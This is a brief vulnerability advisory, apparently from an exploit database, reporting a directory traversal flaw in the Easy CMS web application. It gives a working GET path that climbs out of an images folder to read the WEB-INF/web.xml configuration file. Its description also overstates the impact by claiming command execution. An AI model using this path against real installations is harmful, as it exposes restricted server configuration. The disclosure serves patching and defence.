Easy CMS Directory traversal Vulnerability

2017.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |=============================================================| |[+] Exploit Title : Easy CMS Directory traversal Vulnerability |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor : https://github.com/moocss/EasyCMS |[+] |[+] Download Link : https://codeload.github.com/moocss/EasyCMS/zip/master |[+] |[+] Tested on: Kali Linux |[+] |[+] Date: 1 /1 / 2017 |=============================================================| |[+] Vuln Path : http://127.0.0.1/EasyCMS-master/WebRoot/admin/assets/images/../../../WEB-INF/web.xml? |[+] Method :GET |=============================================================| |[+] Vulnerability description |==============================| |[+]This script is possibly vulnerable to directory traversal attacks. |[+]Directory Traversal is a vulnerability which allows attackers to access |[+]restricted directories and execute commands outside of the web server's |[+]root directory. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : M.R.S.L.Y |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top